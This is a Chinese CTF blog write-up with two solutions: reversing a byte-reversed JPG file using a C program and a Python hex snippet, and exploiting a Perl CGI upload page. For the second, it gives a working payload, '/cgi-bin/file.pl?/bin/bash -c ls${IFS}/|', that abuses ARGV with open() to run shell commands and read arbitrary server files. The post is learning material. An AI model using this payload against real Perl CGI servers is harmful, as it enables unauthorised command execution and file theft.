CTF每日一题-Day6


D6 T1 Reverse-it

本来打算做pwn1的,结果卡住了,先做道misc

下下来file一下是个data,binwalk也没结果用winhex打开没啥头绪

突然想到Reverse-it啊,文件尾8D FF倒过来就是FF D8是JPG文件的文件头

写个脚本把文件整体倒一下

随手写了个这个

#include <stdio.h>
#include <stdlib.h>
char swap(char c){
    char hc;
    hc = (c&0xf0)>>4; 
    c = ((c&0xf)<<4)+hc;
    return c;
}
void reverse(char* s,int len)
{
    int i=0;
    char c;
    char hc;
    while (i <= len / 2 - 1)
    {
        c = swap(*(s + i));
        *(s + i) = swap(*(s + len - 1 - i));
        *(s + len - 1 - i) = c;
        i++;
    }
}
int main()
{
    FILE *a,*b;
    a=fopen("a","rb");
    b=fopen("b.jpg","wb");
    char *s=(char *)malloc(sizeof(char)*12000);
    fread(s,sizeof(char),7698,a);
    reverse(s,7698);
    fwrite(s,sizeof(char),7698,b);
    fclose(a);
    fclose(b);
    return 0;
}

勉强能跑出来

~忘记是这按字节倒的了~(脚本更新了)

其实输出HEX直接倒一下就可....

用python

a = "9DFF700DB6DAFC937263282222BDD218B425D47B8C00A1AB609EE707BB0431567B5AD684BBD4B97E00A0AB6D36CD31C9A4D1012D5872A9B53ACFC1041B514700DD700814E9659377B431377696F81049A511CD308FD81C89C8C46B449415F88BBC00A1AB26BC992614022D81E50B0EB453D69E930827B6E670A0915ED7898B502BC3DCAAD5850781047B5347C1AF5D51AEC2597A7739B22FEC2E21308E6B6293833E57C8C8D61CEF2BF7A96D52600DE6DC1813E146A2C1081B6544A37D495DD01049E9009CBCF851D9914D71286E4DE3FC8CD6C8C1AED2692B40AE26D6C00ACDA94D35F45CE04441B1A6D5ADD3D7961C16005B65AF3C047C8348E424EA866B7D4A5ED460051D55EFAF02F42352606B7CA1DC197F4AAF697B3700DA654E5FE6388C6C5AB7B053956D6EA230827BAD13070F389BB41B82512EAD64A62BCC16005D6DBE00FF8FEFF90FCFF07BDFB8104DA510F7ED6BBC033FB4426D96BBD7A39104BA5378E87DFADDE22A0BF96A1B248A7C3591041475AF84EC576878A4C8956F74DDCAF6DCFC1041B59E11B7259C3913931601ABD2D66579676F8104FA59E3D7C2FC033F9E6189C174CDED3969719104DA59E300FF19F338C675AD83CE52AABA4A52540058D13CEE641A8010988C96AAACF37A23D17831DD56A85E8500A911A3681AEAC04296CC5C65C99ED28C551E67ECAEE80BBAFB0DFFF00A7F87E0A267B3320CB15787BCDDAD9D9A2E068552FABAC3E866BB7B153DA43082DF37E04DEEF2B2BCC868AD7AB634ED0F951EF856C5DDF217278B3EDE85B3539F5005C9703D1F6B0CAD48B6D8CCBD44DABDB1AE5FF7CEF108926210E69BE410866C14D30660194AF85467DAC36C8A26B3689F8BCD99069886A588B0AF28D0041FCDDCD54752051D5A2B174BD2517238A09BDD9BF4CA3A503AEDD3104DE14CEB289D81909D4B1D89573D0D730EAB4700FFD47E351962D26D127104374099E9233884E868A30F4DAF2C01CCA8AF80E9DBF458FA07D0C3963AE01A104DAFF320B741B9C27B2779A6215F47451723AA09F999B9CAACCEDA4DBB6A308AD7EF39194EE74240CCDF10FA95FB674575EA9A300C90E4E42126C68DBDB2A3082AE3B51B7CC99001A577CDDD5EC5BE979F04EA4621DE384B22FAEE300DCDE3FC59C8B6C236FC483579A7F939FD66E1814025439256DE8353E2630866AFC14D38C3391A29818A67F869A6AF532985BE1703EA297D59B7C136BB7B153D2900A9A7BBBBB80909EAF701D2CA5E6F2553939183E86763FC884B26EAE253082CF590C25244B2340B67737E55DDCA5F81830E642DCB91B141F45E57D4D600DAF0E1A7D3F40736967295B025D5BCB046EA8D00A04D1E62096A1BDE61C0B6C3D4BAF8510054D4700DC1F0CECE2B0A2646C9701468E1E1857D00FF78E927B585244CD0FC09B00A778BFE5EB1AC01E59229228FB7229ECA938E1B0A090EE00A4F4FBD9AC89AB967CB8C54857153A0750D104BE7EE000FC3E8945AD94945B97B6AB9B7BF9B66308ED3EE140FC4783436262AF291DE94E4D6CAED00A7F9F74E9EEFBC7303F09E4B961E9D1D4A7D00FFBD7F025E8510CA6DBEA2600540328C03A4D55957518B3070791AE36D84A846EE9D6AC7B4A104BE9E8170E9DC270AB3B86B7B45FE259BB9CA0AF4291500E4E4E294C83B12FEEA8E00F30011301120001030C000ADFF91004000DDFF7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7B7BC766C77BC49292C4D292D2D1D1B1103400BDFFFAFAFAFAFAFAFAFAFAFAC9C9C9C9C9686868686868F6F6F6F6F6F6F6F6C5C5C5C5C5C5F6C59494949494C5946363636394636262626362616162616161616161003400BDFFAF9F8F7F6F5F4F3F2FAE9E8E7E6E5E4E3E2EAD9D8D7D6D5D4D3D2DAC9C8C7C6C5C4C3C2CAB9B8B7B6B5B4B3B2BAA9A8A7A6A5A4A3A2AA99989796959493929A89888786858483828A797877767574737A696867666564636A595857565554535A494847464544434A39383736353A292827262A19181711F521E434261A01D2726510F253332901C1B1A19244180182322311716701514216013125040113020100077201000404050704030404020102000115B004CFFB0A0908070605040302010000000000000101010101010101010300010F1004CFFAF9F8F7F6F5F4F3F2F1FAE9E8E7E6E5E4E3E2E1EAD9D8D7D6D5D4D3D2DAC9C8C7C6C5C4C3C2CAB9B8B7B6B5B4B3B2BAA9A8A7A6A5A4A3A2AA99989796959493929A898887868584838A797877767574737A696867666564636A595857565554535A494847464544434A3938373635343A29282726252A191817161A09028272633420F1D25511C1B2432801A19182341172270161531601413122150114000302010D7100000404050503040203030102000015B004CFFB0A0908070605040302010000000000000000010101010101050100000F1004CFF101130101120002110308C00A1008011000CFFFFFFD6FFCDEFB4EFABDF92DF89CF70CF77BF7EAF75AF7C9F839F8A8F918FA87FBF6FD66FED5F055F2C4F434F7A3F913FC82FFF1F271F5E0F850FCCFE04FE4BEE82EEC9DE11DE68CEBFBE07BE5EAEB5AE0D9E649ECB8E238E9A7EF17E696ED06E485ECF4E374EBE3E363EBD2E352ECC1E441EDB0E630EFAFD92FD2AEDC1ED69DD01DDA8CD50CD08BDBFAD67AD1F9DC69D8E8D468D0E7DC57D8D6D556D1D5DE45DBC4D944D6C3D443D1C2DF32DEB1DC31DAB0D930D8BFC73FC6BEC63EC5BDC53DC5BCC53CC6BBC63BC7BAC83AC9B9CA39CCB8CD38CFB7C147C3C6C646C8C5CB45CEC4C154C4D3C853CBD2CF52C3E1C761CCE0C070C5FFBA7FBFFEB48EBA0EBF8DB51DBB9CB12CB7ABBE2BB5BABB3AB2C9BA49B1D8B958B0E7B867B0F6B976B106BA85B315BC94B524BEA3B833B2C2BB42B6D1B061BAE0B570B000BB8FA61FA1AEAD2EA8BDA44DA0DCAC5CA9EBA57BA20BAF8AAC1AA9A9A739A4C8A258A0E7AE67ADF6AB86AA16A9A5A835A7C4A654A6E3A673A603A692A622A6B1A741A8D0A960AAFF9B8F9D1F9EAE904E92DD946D97FC998C9C1C9FAB924B95DA986A9CF99099942998B89C4890E795779A079F96943699C59F5594F49A84902496B39D4393E29A72911298A19F3196D09E6096009E9F863F8ECE866E8FFD889D813D8ACC836C8CFB869B803B8ACA846A8EF9899983398EC8896884088F978B3787D682768E068BA5874583E480848D148AB3875384F2829280328DC18B618A0188A0874085EF748F732F72CE726E710E71AD714D71EC718C712C72CB736B740B75AA764A77E979897A297CC87E68711873B7765778F67B967E3671E5758578257CC47074741478B37D53710376A27B4270F175917A3170E076807B2071DF687F6E1F64CE6B6E621E69BD606D680D6FAC675C6FFB67AB6F4B67FA6F9A684A61F96A9963496CE866986F3869E763976D3768E662966D3667E562956D3569E4649460446BE36793634360F26C92694265F162A16F416CF06AA06750650063BF516F5F0F5DBE5C6E5A1E59CD587D572D56DC568C553C55EB559B554B55FA56AA565A570A58B959695A195BC85D785F2850E75297544757F659A65C565F0652C5557558255BD45F84524456F35AA35F53531357C25C72513256E15B91505156015BB0517057205DDF439F494F400F47BE4E6E452E4CDD439D4A4D420D4ABC427C4A2C42EB4A9B435B4C0B44CA4D7A473A40F949A943694D1947D841984B48450840C74B77453740F64BA6476642264ED54A95455542154EC44A844744430440C34D734A3347F245B2427240324EE14CA14A61492147E046A04460432042EF32AF316F312F30EE30AE306E302E30ED31AD316D322D33EC34AC356C372C38EB3AAB3B6B3D2B3FEA32BA347A363A39F93CB93F793249350938C83C883058341837D73C973067342739E63EA6327637363DF532C537853D45331538D43E9435643B2431F338B33F7336433D0334D23B9233623A2232F13AB132813A4132113BD034A03C6035303EFF27CF219F2A5F242F2EEE27BE228E2C4E261E21ED2BAD267D214D2C0D27DC22AC2E6C293C250C21DB2D9B296B263B220B2FCA2B9A286A253A220A20D92D992B692839260924D822A821782F382D082CD72BA72A772947281728E627B627862756272627F527C527952865283529052AD42BA42C742D442F1420F322C32493266328332A032DD22FA22282255227222BF12EC121A1257128412C1120F024C028902C60214025102AEF1FBF149F196F1E3F131F19EE1EBE149E1A6E104E161E1CED13CD199D107D174D1E1D15FC1CCC13AC1B7C125C1A2C120C1ADB12BB1A8B136B1B3B141B1CEA15CA1E9A177A115A1A2A140A1DD917B911991B69154910291AF815D81FA81A88156810481B1817F712D71EA71987156711471D171AF616D612B61F861C6619461626130610E51DB51B95187516551435121510F41EC41DA41B841A6419441724160415E315C314A31383136313431323130313E213C213A21482146215421622170218E119C11AA11C811D611F411131131115F017D019B01B901E7011601340162019001CEF0FCF03BF069F0A7F0E5F014F052F090F0EEE02DE06BE0B9E0F7E046E094E0E2E031E08FD0EDD03CD09AD0E8D047D0A5D004D062D0D0D03FC09DC00CC07AC0E8C057C0C5C034C0A2C021C09FB01EB08CB00BB089B008B096B015B093B022B0B0B03FA0CDA05CA0EAA089A018A0A6A045A0D3A072A011A0BF905E90FC90AB904A90F89097904690F490A39052900190BF807E802D80EB80AA8069802880E680A58064802380F180B0808F705E702D70FB70CA709970687047701670F470D370B270917070705F603E601D600C60FA60D960C860B760A6609560846073607260616060606F505E505D505C505B506A50695068507750765085509450A350B250C150D050EF400F401E403D404C406B408A40A940C840E7401740364055408440B340D2400240314060409F30CE300E303D307C30AB30EA302A306930A830E73027306630A530F43034308330D23012306130B03000305F20BE200E205D20BC201C206B20CA202A208920E8204820A72017207620D5204520B42014208320F2206220D1204120C0203020AF102F109E101E109D101D109C101C109B101B109A101A10A9102910B8103810C7105710E6107610061095102510C4105410E31083102310B2105210F11091103110D01070101010BF006F000F00BE005E000E00BD005D000D00BC006C001C00CB007B002B00EA009A004A00F900A90059000900B80068001800C70077002700D60086003600E50095004500F400A40054000400B30073002300D20082003200E10091004100F000A0005000000000400000000000006727573602452534000000000276963720000000F8200000000000000000000000000000000000001000000000000000371656D67EF17500000005006590C4000000000002A5958510000000E9C53000B0314000CCDE300041FC0100E2F54100EF4A31000000000077569667000000000000000000000000000000000000000000000000000013E223D2636393136334549402E69602E6F696479646E6F6340276E69677569665025636E6562756665625C2000000000000000000000013E223D2636393136334549402E69602E6F696479646E6F6340276E69677569665025636E6562756665625C20000000000000036375646000000000000000000000000000000000000000000002474253702D2025636160737022757F6C6F636022474250247C657166656440213E223D2636393136302345494E200000000000000000000002474253702D2025636160737022757F6C6F636022474250247C657166656440213E223D2636393136302345494E20000000000000036375646000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008636E2365696E2777777F2F2A307474786023454946100000000000000000000008636E2365696E2777777F2F2A30747478602345494610000000000000036375646FC6B000048F000000A4200000000000002A59585AD810000587B0000992600000000000002A59585093000005F8300002AF600000000000002A595850000000000000000000000000000000002A59585CC61100000001000153F00000000000002A59585000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013E223D26363931363345494022474253721000000000000000000000013E223D263639313633454940224742537210000000000000036375646000097E61607D6F63402462716B6361605D2474756C67756840283939313029236820247867696279707F6340000000047875647C0800000C340000034254526C0800000C340000034254576C0800000C340000034254527C0000000034000008636564742000000C0400000371656D6410000008F30000096D657C6420000004D3000007756966768000000C430000046565767880000004C2000004646D646070000004520000046E6D6464100000004200000A595852641000000C2200000A59585764100000081200000A595852741000000402000004707B626410000000F10000047074777C6000000481000003637564633000000051000004727073611000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002020584D23D0000000010006D6F0000000000000000000000000000247425370234549400000000456435D40737361600001300600090002000EC7002A59585022474252747E6D600000120F6E696C484C0000010100054C49464F42505F534349485C02EFFE7248FCE8990089E402B00F89DC8D14D0100000000005240D49424830000000000004040D49424830003E2330207F68637F647F686058300DEFF00E3F3227722D346E656024756B636160787F3C3020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202E3164756D607D687A387F2C302E3644425A3664627F2C302E3F2229333A31313A38313452323D21313D24313032322D35647164497669646F6D4A307D687022233E2330227F64716D6C65687960522D3C6F6F64527F64716562734A307D6870222F203E213F2071687F2D6F636E25626F64616E237E6F2F2A30747478622D307D687A337E6C6D687022222D34757F62616A366462702E6F6964707962736375644A3664627C302E3223237E6D2871647E69737D2664627D22323F22303F293939313F27627F6E23377E2777777F2F2A30747478622D3664627A337E6C6D68702644425A3664627C302E32203E243E253025627F6340205D48522D3B64707D687A3870222F2164756D6A337E6A35626F6461622D387A337E6C6D68702164756D607D687A387C302E3F322469336B6A73645E4A7355627A7849686563407D403D4537522D346960222FBBBFE22D3E696765626024756B636160787F3C300F203E213F2071687F2D6F636E25626F64616E237E6F2F2A30747478609901EFF00000000A1000000100000004000300A8C000000100000004000200A00001000100000003000100A3000002303A31343A30313022323A30303A31303032364001446F62656020586F647F63786F6070254C656D656E6473710000000840000001000000084000000000000000A0000001000000040009678C80000004100000020002310270000009100000020001310000020001000000030008210A6000000100000005000B11026000000100000005000A110000010001000000030002110700080000000A200D4D40000669687542D001EFF00008400840010101000649464A401000EFF8DFF"

b = a[::-1]

print(str)

b.jpg

拿到这张图,用画图工具翻转一下就可

D6 T2 i-got-id-200

用perl写的网站

然而我不会perl......

有个文件上传界面

上传完会把文件里的东西以文本格式读出来显示在页面上

还是先抓个包看看

POST /cgi-bin/file.pl HTTP/1.1
Host: 111.198.29.45:57795
Content-Length: 292
Cache-Control: max-age=0
Origin: http://111.198.29.45:57795
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDYZHzjAneIJ2wk7a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://111.198.29.45:57795/cgi-bin/file.pl
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=pqnmaqdihhvciqqc9uhaeod893
Connection: close


------WebKitFormBoundaryDYZHzjAneIJ2wk7a
Content-Disposition: form-data; name="file"; filename="233.txt"
Content-Type: text/plain

23333333
------WebKitFormBoundaryDYZHzjAneIJ2wk7a
Content-Disposition: form-data; name="Submit!"

Submit!
------WebKitFormBoundaryDYZHzjAneIJ2wk7a--
HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 13:57:38 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 564
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
    <head>
        <title>Perl File Upload</title>
        <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    </head>
    <body>
        <h1>Perl File Upload</h1>
        <form method="post" enctype="multipart/form-data">
            File: <input type="file" name="file" />
            <input type="submit" name="Submit!" value="Submit!" />
        </form>
        <hr />
23333333<br /></body></html>

查阅资料发现Perl CGI 有个很经典的漏洞类似这个题目

use strict;
use warnings;
use CGI;
my $cgi = CGI->new;
if ( $cgi->upload( 'file' ) ) {
    my $file = $cgi->param( 'file' );
    while ( <$file> ) {
        print "$_";
    }
}

问题就处在这个<$file>上

  • “<>” doesn’t work with strings

    • Unless the string is “ARGV”
  • In that case, “<>” loops through the ARG values

    • Inserting each one to an open() call!

所以我们试着加个ARGV就可以利用open()任意读文件了
根据参考资料中的ppt我们甚至可以用bash遍历一下目录

/cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/| #遍历根目录

找到flag

直接读一下即可

参考资料

Perl CGI 问题:https://www.blackhat.com/docs/asia-16/materials/asia-16-Rubin-The-Perl-Jam-2-The-Camel-Strikes-Back.pdf

声明:Eki's Blog|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - CTF每日一题-Day6


A Dreamer Full of Dream